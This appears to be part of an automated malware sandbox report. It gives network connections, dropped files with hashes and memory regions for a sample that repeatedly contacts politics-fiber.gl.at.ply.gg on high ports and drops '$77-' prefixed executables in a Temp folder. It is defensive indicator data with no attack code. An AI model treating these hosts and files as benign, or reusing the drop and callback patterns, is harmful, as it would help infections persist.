| NL | 46.228.164.11:443 | ad.turn.com | tcp |
| IE | 34.255.242.185:443 | ice.360yield.com | tcp |
| US | 8.8.8.8:53 | 93.43.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.105.202.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.110.134.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.223.60.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.84.75.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.151.46.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.132.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.70.250.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.174.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.26.90.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.93.230.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.33.132.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.226.220.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.171.193.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.129.111.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.6.157.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.193.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.71.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.216.214.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.158.204.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.16.207.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.228.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 96.46.186.182:443 | sync.aniview.com | tcp |
| US | 52.46.151.131:443 | s.amazon-adsystem.com | tcp |
| NL | 188.166.17.21:443 | match.adsby.bidtheatre.com | tcp |
| US | 34.111.131.239:443 | idsync.frontend.weborama.fr | tcp |
| NL | 79.127.227.46:443 | id.rtb.mx | tcp |
| NL | 185.64.189.116:443 | ow.pubmatic.com | tcp |
| US | 8.2.110.33:443 | us.shb-sync.com | tcp |
| NL | 35.214.241.248:443 | ads.creative-serving.com | tcp |
| GB | 108.156.39.10:443 | s.ad.smaato.net | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 35.214.241.248:443 | ads.creative-serving.com | udp |
| NL | 69.173.156.148:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.com | tcp |
| GB | 18.245.187.42:443 | live.primis.tech | tcp |
| US | 52.87.13.120:443 | sync.ipredictive.com | tcp |
| IE | 63.33.158.21:443 | ce.lijit.com | tcp |
| US | 172.64.146.152:443 | capi.connatix.com | tcp |
| DE | 18.196.133.194:443 | match.sharethrough.com | tcp |
| US | 34.111.113.62:443 | pixel.tapad.com | tcp |
| US | 8.8.8.8:53 | 120.13.87.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.158.33.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.113.111.34.in-addr.arpa | udp |
| US | 34.111.113.62:443 | pixel.tapad.com | udp |
| US | 69.173.151.100:443 | pixel-us-east.rubiconproject.com | tcp |
| DE | 91.228.74.200:443 | cms.quantserve.com | tcp |
| DE | 85.114.159.93:443 | dsp.adfarm1.adition.com | tcp |
| DE | 35.157.30.247:443 | sonata-notifications.taptapnetworks.com | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| NL | 35.214.216.135:443 | csync.loopme.me | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| NL | 208.93.169.131:443 | bh.contextweb.com | tcp |
| SE | 213.155.156.184:443 | d5p.de17a.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| FR | 141.94.171.213:443 | pixel-eu.onaudience.com | tcp |
| DK | 77.243.51.122:443 | uipglob.semasio.net | tcp |
| BE | 35.210.53.219:443 | pool.admedo.com | tcp |
| BE | 35.210.53.219:443 | pool.admedo.com | udp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| NL | 35.214.216.135:443 | csync.loopme.me | tcp |
| US | 34.102.163.6:443 | ad.mrtnsvr.com | tcp |
| NL | 193.0.160.131:443 | p.rfihub.com | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| SI | 195.5.165.20:443 | core.iprom.net | tcp |
| IE | 52.215.155.11:443 | cm.adgrx.com | tcp |
| FR | 141.94.242.226:443 | green.erne.co | tcp |
| SG | 35.186.154.107:443 | cm-supply-web.gammaplatform.com | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| US | 104.18.24.173:443 | s.tribalfusion.com | tcp |
| FR | 146.59.148.16:443 | pixel-eu.onaudience.com | tcp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| NL | 46.228.174.117:443 | sync.targeting.unrulymedia.com | tcp |
| FR | 141.94.171.213:443 | pixel-eu.onaudience.com | tcp |
| DE | 23.88.86.2:443 | matching.truffle.bid | tcp |
| DE | 3.122.214.165:443 | ps.eyeota.net | tcp |
| DE | 3.122.214.165:443 | ps.eyeota.net | tcp |
| NL | 46.228.164.13:443 | d.turn.com | tcp |
| DE | 57.129.18.111:443 | ws.rqtrk.eu | tcp |
| IE | 34.251.19.157:443 | pm.w55c.net | tcp |
| IE | 34.250.160.0:443 | pm.w55c.net | tcp |
| N/A | 127.0.0.1:50331 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| DE | 162.55.120.196:443 | matching.truffle.bid | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| GB | 185.83.71.234:443 | sync.adtelligent.com | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| GB | 104.86.110.120:443 | tcp | |
| US | 20.42.73.31:443 | browser.pipe.aria.microsoft.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| BE | 23.41.178.27:443 | r.bing.com | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| GB | 2.21.188.27:443 | lg3.media.net | udp |
| US | 34.36.177.187:443 | related.icananswerthat.com | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:51614 | tcp | |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
Files
\??\pipe\crashpad_5004_SPKWPTGMQUPDTWCV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | fb2e4b4989f1b96485895c7839ea2548 |
| SHA1 | d21cd5a9018e8c18eb8610ba9ab93e7ff438d964 |
| SHA256 | 2a2276092d890b2bdda7c29321677fa1849497c9c3a0480052015db849f9e295 |
| SHA512 | 08fe73784d41a85b9daa959f5cdb982e99aa7dd29ba288eeecdac7c67b27915a9e5a12639cdf730dc05839b073155dafe7bf522938c784767346b6ed1ec8a1b4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a20be48bec30f46e4480ef0b6c5ce264 |
| SHA1 | b88c6995c85015940555df09943028935170beb7 |
| SHA256 | 7c7cd25fa704b20d38a0e546cf054bb2b8c7d147e7e08b26df6f9b4d57103507 |
| SHA512 | 04769c9fbdcfef7277a05d519ad4d2d741a3ef999e15693081c6b32be489be345b4bc5167448aa87ef62ed678f06078ed79fdb85766555709044d6e6d8dc8598 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d4a1f7110fd2d53bbd7d9b557882e299 |
| SHA1 | 62aba993bb7cd216c2f5eb9b91c3c3cc3b182991 |
| SHA256 | d4f4231b51bbd7bf9bff8c51377ea8370e5e4aedee4a2e01171b668caa6d7e8c |
| SHA512 | 6589a92aabc3e19d10eeef21a4a2aeb8af36c1073598bf70ad25861bc1392b21d1ed43bd14b98f86b136d11c078475653593bbeeb09b9bbaeb0e0e0cbf71adc8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 83be8772b345d555d76cba96c719b0ec |
| SHA1 | 57bfef2b3d40a96dd7903ac53d6fa19e62708186 |
| SHA256 | 3ea5c54e3a6b34bb318f26b81ea94a1bfd38e298e3feca1e03ae9ad857506a8a |
| SHA512 | b7a1557b14b1e4c4158fc973fd434243da88a5f948e16bd9f4b93f7e4363a56ae0e6fb029b0fcf517b1f99124e3324de93a7f61a276aaf367b471747e3207967 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 80faf8da59c87e3470d7e5c39570965e |
| SHA1 | 5591d926f085ec3f70dd7d6642628eea139ee1ef |
| SHA256 | ec406d96ded7030cc2a179d2a179d9497c5eadeb93ee7296dc182c210890617d |
| SHA512 | 4cfe38bf7eb4b0b6c5660e06482f8981e5b2205318167eb420296deb3b33724943a25e2818e869cc960c49b484895448ec3423c4b238dd217fd63a64be68f3bb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\eb71c1b5-9087-4ad6-b8dc-6611bb461dcb.tmp
| MD5 | 1175dc7503145de04a94a52c4b82d154 |
| SHA1 | c8a89114bcbcfbca4c392a96beaeb4364b68aeea |
| SHA256 | f0ce9fb0a03ffede8f7d8e3508b9c710c470afc4dcb12bb4123fccffecc99fc2 |
| SHA512 | f645658aad8dbd054896736f3267a5a3dcecb2095fa7f4626e0b647c5e127b6c950d9c04d740fb2c31738fabf40ad438b21953ed518ec5b176b0b18a632d6b22 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4ca4f857a6a0bbd490e11d46ad2a9917 |
| SHA1 | 949d03f104b0601ec69d58c90ae76f6662857802 |
| SHA256 | a103045d59590845206fbdbcd3d5f3cc50f016ae31000e368e00b5f38361a62e |
| SHA512 | 8382a4d0749f866a501a3c322430e7af4a1e51bbfa03ba472c7ea87513cd655131732b029c649f80f5b39e6a071953a1d41f39652037538423275a45d6429430 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d3e45046a5f2fc0ad25265bba4bff0e8 |
| SHA1 | 2b40f3aae2661239dc300d9a4831c9df6bce0341 |
| SHA256 | 40d7efaa62274ec1323c91e545e776f5891a4c4495069df108526ef809b2d057 |
| SHA512 | 1179775eab143e45422ffe08011efdb46bbda72405c078a5cc18516e66bac004ae0e1f0c26dfc12573ced6dfece648e7fee91ac95044e3d0da9b394a3483be43 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | c34a132b5afa56a99c86e6c9d5a7a251 |
| SHA1 | 9ac7d312831d08f8e108d840031cb6279661bf8a |
| SHA256 | 3335ad700bd2b1cb2e62596b6a68550a7160498543969d062a0dc0c64c75c54f |
| SHA512 | 7a593c9d206e3f0ead8e402a878d975e493915070a8715e477f53eb2a60485cb63d11265cf599157ed9a241297276d88505792f14681769aad376479c409270c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\10e24cbc-4ccf-467b-be53-24f32f0c57eb.tmp
| MD5 | 2c35ef4824ce6b9fac269b83a27db3e5 |
| SHA1 | a688573cd0fb09588f2db42f746c68bbb597b46e |
| SHA256 | 0aa0a17d92ca90eb8afd3f3d246e5d03ae63dad0f8f64eaa9d38c4674bd91435 |
| SHA512 | e30672958926301866f5df904aad96549f7f3e564a10a610411d6f92fd65d36fc609634159b8250eeffad26520ea89fd6447dbecbf9943c6a3eaeaaa3561ea2f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e176fbc928ce1b88490afa665f707bb6 |
| SHA1 | a8273fe4cc0a75d08de3a9fe8630e34412c543fb |
| SHA256 | 64f490c9aa6e238293e1293bcd2f34a5d7965c22bcf79a5ff94bef52a8633a96 |
| SHA512 | 2bf3b8c6197f278cd0673c34fb43b255b785fcef7350233f3605b8f2cda43fdeff1c05ae4b19c1d9b91e903e228ec8aea35f49b1c8c6cd731fd63ce615303985 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d9a2b985e64e79d6e650b6cbd4b67a6c |
| SHA1 | 25f66d86ec93f6ccdde3be79d621a3fa6dfbe894 |
| SHA256 | 5fce3371ff401c11d334037cb284b9422174d076e55373919346a9059455a4ad |
| SHA512 | b182b1b113f499b3924b7bbd7f5e08670a48e36f4fb97a599ab546b574cf3bd6473476c40efae84544c6b254042955918d784abd87989345e47015bcc1673171 |
memory/9052-354-0x00000000748FE000-0x00000000748FF000-memory.dmp
memory/9052-355-0x00000000008B0000-0x0000000001B50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
| MD5 | 77a71f3a441aa3bf824967e52413bec5 |
| SHA1 | c3d6df5cfc5eefaadf9bcb3703484e3cadf79588 |
| SHA256 | 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82 |
| SHA512 | 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b |
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
| MD5 | f10712f4faa374be8f37668c5ebed4a6 |
| SHA1 | bb30e941c4f91ae3178539e993abecbfd838fdb0 |
| SHA256 | d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf |
| SHA512 | cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac |
memory/4608-465-0x0000000000E50000-0x0000000000E62000-memory.dmp
memory/7108-477-0x0000000000A90000-0x0000000000AA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
| MD5 | 18f497deffe88b6b2cff336a277aface |
| SHA1 | 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e |
| SHA256 | 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5 |
| SHA512 | 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d |
memory/6656-548-0x0000000000620000-0x0000000000666000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
memory/6656-561-0x0000000000D70000-0x0000000000D76000-memory.dmp
C:\Windows\Temp\__PSScriptPolicyTest_53ly5u5v.avc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/6964-576-0x000002025A9F0000-0x000002025AA12000-memory.dmp
memory/6964-577-0x000002025ADA0000-0x000002025ADCA000-memory.dmp
memory/6964-578-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmp
memory/6964-579-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmp
memory/7456-584-0x0000000140000000-0x0000000140008000-memory.dmp
memory/7456-585-0x0000000140000000-0x0000000140008000-memory.dmp
memory/7456-587-0x0000000140000000-0x0000000140008000-memory.dmp
memory/7456-591-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmp
memory/7456-590-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmp
memory/7456-589-0x0000000140000000-0x0000000140008000-memory.dmp
memory/7456-586-0x0000000140000000-0x0000000140008000-memory.dmp
memory/640-597-0x0000020989000000-0x0000020989025000-memory.dmp
memory/640-598-0x0000020989030000-0x000002098905B000-memory.dmp
memory/1000-628-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
memory/700-616-0x000001E5DED40000-0x000001E5DED6B000-memory.dmp
memory/1000-627-0x000002086EFC0000-0x000002086EFEB000-memory.dmp
memory/428-639-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
memory/616-643-0x00000214D9FB0000-0x00000214D9FDB000-memory.dmp
memory/428-638-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmp
memory/428-632-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmp
memory/1000-621-0x000002086EFC0000-0x000002086EFEB000-memory.dmp
memory/700-610-0x000001E5DED40000-0x000001E5DED6B000-memory.dmp
memory/640-606-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
memory/640-605-0x0000020989030000-0x000002098905B000-memory.dmp
memory/640-599-0x0000020989030000-0x000002098905B000-memory.dmp
memory/700-617-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmp
memory/7456-594-0x0000000140000000-0x0000000140008000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 875c23fa20119622ef0030e7bf0f2f82 |
| SHA1 | 2d7a3f667ea3b9b28673aebbceb60b4eea596813 |
| SHA256 | 363de1ffe20ed402b6c6b7433bc1bad4a6adcec2da1b736a77669d6418117202 |
| SHA512 | 527c09a2dd5c70831c55df047b94e267baa29c991383daed3646c44e003fefe874cb0b9f487a12de82ad9baabcbbb46c909a8af7135139d1b5b77c6cee38997e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | cc801b74aec86aa2a132b02d7b1837af |
| SHA1 | 40419a19184587d4a79fe4874d5a488efd306a01 |
| SHA256 | 44294b94b8aca246021f286fd8dafd317cdc87cfd06ab4f9bf1f46266eff4013 |
| SHA512 | 7750cf17f220c9bdaaa1c4014afbb130bf0696ededebc67be76b1e14bc977cfb1a805e8559ec6be171e88e08d1417746bff9d17f942c84e3ef777a89e1a367a4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | a8d31e76af0e259bbb030f80b097cf8e |
| SHA1 | e043a7c0a0f44e06db0f7214870609d209e01b6d |
| SHA256 | 43541f587d8c056407b7ba51fd11532aa69498639749056dab3f408841fb4e13 |
| SHA512 | b86a1a9d8b3c5b78e5bc5f8f5152ed2cf55444bce455a87ed7975ef4a482cb8d5b56107e9350b6bbeb3ca3bb36be350f3ff678fe12c7fc0aa59c784f459db776 |
memory/6656-1473-0x000000001C780000-0x000000001C7F6000-memory.dmp
memory/4608-1476-0x000000001CD40000-0x000000001CD4C000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 32abb4c73aa6dee7d892ca30d432c74e |
| SHA1 | 603a9045df757fd1bf4defa48a11f54d72d53add |
| SHA256 | a64f54473b45ad2201f19886dda97bd8d27a30485f1303656dcb4ac8cab8ad46 |
| SHA512 | 7dedd14a5b0dc5e178748382c066fcdbf4ab8409e787fc0ef706f22dc20d6da2935acf3866b6de2d180ed9f441f1529e71ba769aeda2723927dc435f4be375f9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 8b7ceacc0f2fa0557e3cd79b88983613 |
| SHA1 | b06c3b1677d2a7ba1c75cf32e5aa41e63712888a |
| SHA256 | b326b55a265055eb350e6e0cd34aa43932d4716e6afb690459dd1a9293290b99 |
| SHA512 | 21b2048c1d3162bd685728fd1700b424af853b5d0559f63154fb16bdc04553c9b48c65bb2b5963fc4bff48fcfc025c560aaa6679e67b8d4024f5f6a5424eda02 |
memory/4608-1568-0x000000001CD50000-0x000000001CE00000-memory.dmp
memory/4608-1569-0x0000000020590000-0x0000000020AB8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | c4f3c29f24adac0d8c033d2c1e5508f3 |
| SHA1 | f272966060d0f451485c6430a99aad749ad96320 |
| SHA256 | 499de30e49f4162b3bc732f176aaf2f4e5f56c95b63b556071197c8bb339b901 |
| SHA512 | 688517453af3168ac76858878cc5ba6c27a3a3b2d51e027547412e6b13ee6d08033b85c10c62aee8d0ed69c84be2d7d52b826ecda03aa0d82fc71fd32519ced5 |
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exe
| MD5 | 1c3b5af02f308c2d61314fe6344a7434 |
| SHA1 | 5a0278ad2d2cd2437044e4d8b5e998533982293b |
| SHA256 | 64a0a588bfb057c877f42773976fd6952be90eafd373b3d0595fe20a8faccd74 |
| SHA512 | 6093b7258e29a04add73acb9f707f70c27149c9d65c9ecdb58452adedb8a7ad40a71af44927cf5b1e181d7ccab3bb39b68d0a737a7ab197943e464956624002f |
memory/6656-1775-0x0000000001000000-0x0000000001010000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 966bd91064a66d138a5fa8eb7e13a06e |
| SHA1 | 9f4e39a60604c933ff0d4e2c2acc35e7dcd44de9 |
| SHA256 | bf8c14f94ad82090d74bc9671c905bb7a50e62441617accfc48cf973466908f8 |
| SHA512 | dd4fc3654326f85de22df57b5ad966828778c39e76e9fe64a73aed40bd924a2c76a18b362da5953deccf987788b9db8430c17489080ab6e007d67dbe49bdeef7 |
memory/6656-1785-0x0000000001030000-0x000000000104E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 4060c33d521b297b208c8d27735af3bc |
| SHA1 | 045c1b88fc574e240ab41c0a3bd5c3b1e1be4bf8 |
| SHA256 | d0a248ff6e821fc8d3a9abcc2eead96a5696efbea754f981efbad74291a43bf3 |
| SHA512 | 9857ff0fb1be80dff585521dab213c59bf240c71a0c4be37db3c48e3d30ea8fa26eede2449e99eba5672fad53101491c33ab804cf6d345339835d428fa209dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | 8f89e07fe4508ddeef1ba4567f254209 |
| SHA1 | b5ef23e62964bfa1afabbc242a317e8b711de7e4 |
| SHA256 | e4540cbba11d2026acb35efb7147ef0b44feb970ca3e316dc7670c603adc41cc |
| SHA512 | 1930e13b538eceb56e2ab19d023fc3df1a4d8f2252f9f72a90df36746b94b0363cabf7737c7c93990f64b2cae2cb7deb195e7c5c326bc3c39057bd3b4bf9bbfd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf5ef9ddb28996eedf404a6293c00330 |
| SHA1 | eb9936808005b16cbf39aa4ecfcf3e2203aef5f4 |
| SHA256 | 76ddb7cf4ed4d19817901e79b0a172e7f63306db03ccd0af32770ad500410c52 |
| SHA512 | 2c63ebecf0f2c754a4553e0bbb1bf1900a1eb04df4167dbd956cea88b6893c3b42cc5e9618d6911aa39cb64644e765880d89a34958a549c8c4ef31246a9c8c21 |